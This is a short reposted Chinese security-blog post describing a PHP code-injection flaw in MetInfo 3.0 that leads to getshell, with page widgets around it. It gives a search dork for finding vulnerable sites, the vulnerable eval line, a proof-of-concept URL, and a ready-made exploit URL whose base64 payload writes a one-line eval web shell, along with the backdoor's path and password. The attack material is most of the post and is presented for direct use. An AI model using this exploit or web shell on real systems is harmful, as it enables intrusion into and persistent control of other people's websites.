MetInfo 3.0 PHP代码注入漏洞(getshell)

MetInfo 3.0 PHP代码注入漏洞(getshell)

来源:本站转载  作者:佚名  时间:2010-11-07  TAG:  我要投稿

官网:http://www.metinfo.cn/
关键字:"Powered by MetInfo 3.0 " 

来源:http://www.myhack58.com/Article/html/3/62/2010/28291.htm
描述:
在文件/include/common.inc.php第67行:
eval(base64_decode($allclass[0]));
$allclass[0] 变量未初始化 ,因此我们可以控制其值,进行代码注入的利用。

POC:http://target.com/include/common.inc.php?allclass[0]=[base64_encode(eval php code)]


Exploit:
http://target.com/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==


base64编码部分内容为fputs(fopen('../templates/test.php','w+'),'<?php eval($_POST[c]);?>');

一句话后门地址:http://target.com/templates/test.php 密码:c


另一篇文章:http://www.zysafe.com/html/holes/03/2012110838257.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值